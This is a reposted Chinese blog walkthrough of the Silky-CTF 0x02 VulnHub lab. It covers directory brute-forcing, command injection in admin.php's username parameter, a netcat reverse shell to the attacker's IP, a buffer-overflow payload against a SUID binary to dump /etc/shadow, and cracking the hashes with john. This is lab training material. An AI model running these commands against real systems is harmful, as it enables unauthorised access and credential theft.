码迷,mamicode.com
首页 > 其他好文 > 详细

Silky-CTF: 0x02 Vulhub Walkthrough

时间:2019-09-21 17:04:26      阅读:123      评论:0      收藏:0      [点我收藏+]

标签:破解密码   think   sql注入   shell   monkey   john   usr   进制   rds   

靶机地址:

https://www.vulnhub.com/entry/silky-ctf-0x02,307/

主机扫描:

技术图片

 

 

HTTP进行目录爆破

技术图片

 

 

技术图片

 

 

尝试SQL注入会被封掉IP

经过尝试发现username字段存在命令执行的漏洞

技术图片

我们执行进行shell反弹

http://10.10.202.131/admin.php?username=nc%20-e%20/bin/bash%2010.10.202.132%201234&password=123456

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

技术图片

 

 

 

amdin.php

<?php
if(isset($_GET["username"])){
echo shell_exec($_GET["username"]);
if($_GET["username"] != "Admin" && $_GET["password"] != "ufoundmypasswordlolbutidontthinkso")
echo "Falscher Nutzernamen oder falsches Passwort";
}
?>

接下来进行提权操作:

find / -perm -g=s -type f 2>/dev/null

技术图片

 

 

技术图片

 

 

看起来应该是利用缓冲区溢出,导入shadow文件,这里我们要构造十六进制的payload

./cat_shadow $(python -c ‘print "A"*64 + "\x62\x59\x6c\x49"‘)

技术图片

 

破解密码

技术图片

 

 

╰─ john --wordlist=/usr/share/wordlists/rockyou.txt passwords.txt

技术图片

 

技术图片

 

 OVER!

Silky-CTF: 0x02 Vulhub Walkthrough

标签:破解密码   think   sql注入   shell   monkey   john   usr   进制   rds   

原文地址:https://www.cnblogs.com/hack404/p/11563065.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!